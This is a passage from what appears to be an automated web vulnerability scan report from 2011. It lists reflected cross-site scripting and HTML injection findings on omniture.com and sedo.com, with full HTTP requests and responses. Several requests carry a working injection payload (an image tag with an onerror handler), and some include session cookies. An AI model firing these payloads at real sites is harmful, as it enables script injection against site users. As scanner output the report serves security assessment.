This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f51b34"><a>51370b9834b HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; omniture_unique=5df950f7c6b3ef928e3cf0587caa37e2; mbox=PC#1318631777052-118529.19#1319936304|check#true#1318726764|session#1318726703775-697602#1318728564; mbox-staging=PC#1318631787015-280970.19#1319936310|check#true#1318726770|session#1318726709893-408414#1318728570; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=764644188291; s_sv_p1=1@26@s/7243/7019/7341/6423&e/20; s_sv_s1=1@16@a//1318726722012; BIGipServerhttp_omniture=101320202.5892.0000

Response

HTTP/1.1 404 Not Found
Server: Omniture AWS/2.0.0
Last-Modified: Sun, 16 Oct 2011 01:06:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 48129
Cache-Control: public, max-age=14400
Expires: Sun, 16 Oct 2011 05:06:32 GMT
Date: Sun, 16 Oct 2011 01:06:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Adobe Online Marketing Suite po
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f51b34"><a>51370b9834b&ignore_skin=0" />
...[SNIP]...

2.13. http://www.sedo.com/rss/rss_list.php [country parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sedo.com
Path:   /rss/rss_list.php

Issue detail

The value of the country request parameter is copied into the HTML document as plain text between tags. The payload 384cb<a>8a75cc362dc was submitted in the country parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss/rss_list.php?rss_id=19&country=US384cb<a>8a75cc362dc&marketActivityPage=true&randomizeRefresh=true&language=us&partnerid=&_=1318724532195 HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:31 GMT
Server: Apache
Expires: Sun, 16 Oct 2011 00:22:31 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Content-Length: 675
Content-Type: application/xml;charset=UTF-8
X-Cache: MISS from 028224
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<rss version="2.0">
<channel>
<title>-]RSS_SUBTITLE_SHOWCASE_CENTERED_US384CB&lt;A&gt;8A75CC362DC[-</title>

...[SNIP]...
<![CDATA[Featured Listings centered around the US384CB<A>8A75CC362DC]]>
...[SNIP]...

2.14. http://www.sedo.com/rss/rss_list.php [partnerid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sedo.com
Path:   /rss/rss_list.php

Issue detail

The value of the partnerid request parameter is copied into the HTML document as plain text between tags. The payload 6765b<a>552c8089353 was submitted in the partnerid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss/rss_list.php?rss_id=19&country=US&marketActivityPage=true&randomizeRefresh=true&language=us&partnerid=6765b<a>552c8089353&_=1318724532195 HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:38 GMT
Server: Apache
Expires: Sun, 16 Oct 2011 00:22:38 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Content-Length: 33799
Content-Type: application/xml;charset=UTF-8
X-Cache: MISS from 518440
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<rss version="2.0">
<channel>
<title>Sedo - Featured Listings US market</title>
<description><![CDATA[
...[SNIP]...
<link>http://www.sedo.com/search/details.php4?domain=ecolets.com&amp;tracked=&amp;partnerid=6765b<a>552c8089353&amp;language=us</link>
...[SNIP]...

2.15. http://www.sedo.com/search/service/common.php [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /search/service/common.php

Issue detail

The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 13371<img%20src%3da%20onerror%3dalert(1)>6da321cd681 was submitted in the f parameter. This input was echoed as 13371<img src=a onerror=alert(1)>6da321cd681 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/service/common.php?v=0.1&o=json&m=commonData&f=tldListCommonAdditional13371<img%20src%3da%20onerror%3dalert(1)>6da321cd681&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:23:11 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 198
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 028224
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"tldListCommonAdditional13371<img src=a onerror=alert(1)>6da321cd681\" to access","ee":"ParameterException"}}}

2.16. http://www.sedo.com/search/service/common.php [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /search/service/common.php

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload e2767<img%20src%3da%20onerror%3dalert(1)>8319f53054f was submitted in the m parameter. This input was echoed as e2767<img src=a onerror=alert(1)>8319f53054f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/service/common.php?v=0.1&o=json&m=commonDatae2767<img%20src%3da%20onerror%3dalert(1)>8319f53054f&f=tldListCommonAdditional&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:59 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 215
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 518440
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonDatae2767<img src=a onerror=alert(1)>8319f53054f\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}

2.17. http://www.sedo.com/search/service/common.php [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /search/service/common.php

Issue detail

The value of the o request parameter is copied into the HTML document as plain text between tags. The payload f37f7<img%20src%3da%20onerror%3dalert(1)>5a916765f3 was submitted in the o parameter. This input was echoed as f37f7<img src=a onerror=alert(1)>5a916765f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/service/common.php?v=0.1&o=jsonf37f7<img%20src%3da%20onerror%3dalert(1)>5a916765f3&m=commonData&f=tldListCommonAdditional&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:47 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 198
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 838164
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"jsonf37f7<img src=a onerror=alert(1)>5a916765f3\"","ee":"ServiceParameterException","p":["o"]}}}

2.18. http://www.sedo.com/service/common.php [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /service/common.php

Issue detail

The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 9c120<img%20src%3da%20onerror%3dalert(1)>0ebd76842c1 was submitted in the f parameter. This input was echoed as 9c120<img src=a onerror=alert(1)>0ebd76842c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /service/common.php?v=0.1&o=json&m=commonData&f=isEverLoggedInCustomer9c120<img%20src%3da%20onerror%3dalert(1)>0ebd76842c1&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:58 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 197
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 468307
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"isEverLoggedInCustomer9c120<img src=a onerror=alert(1)>0ebd76842c1\" to access","ee":"ParameterException"}}}

2.19. http://www.sedo.com/service/common.php [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /service/common.php

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 6f144<img%20src%3da%20onerror%3dalert(1)>8c14f811c07 was submitted in the m parameter. This input was echoed as 6f144<img src=a onerror=alert(1)>8c14f811c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /service/common.php?v=0.1&o=json&m=commonData6f144<img%20src%3da%20onerror%3dalert(1)>8c14f811c07&f=isEverLoggedInCustomer&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:49 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 215
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 865011
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonData6f144<img src=a onerror=alert(1)>8c14f811c07\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}

2.20. http://www.sedo.com/service/common.php [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sedo.com
Path:   /service/common.php

Issue detail

The value of the o request parameter is copied into the HTML document as plain text between tags. The payload 367fc<img%20src%3da%20onerror%3dalert(1)>7f7f876415c was submitted in the o parameter. This input was echoed as 367fc<img src=a onerror=alert(1)>7f7f876415c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /service/common.php?v=0.1&o=json367fc<img%20src%3da%20onerror%3dalert(1)>7f7f876415c&m=commonData&f=isEverLoggedInCustomer&language=us HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us; __utma=1.252949759.1318724533.1318724533.1318724533.1; __utmb=1.1.10.1318724533; __utmc=1; __utmz=1.1318724533.1.1.utmcsr=united-internet.de|utmccn=(referral)|utmcmd=referral|utmcct=/deref

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:41 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 199
Content-Type: text/plain; charset="utf-8"
X-Cache: MISS from 028224
Connection: keep-alive

{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"json367fc<img src=a onerror=alert(1)>7f7f876415c\"","ee":"ServiceParameterException","p":["o"]}}}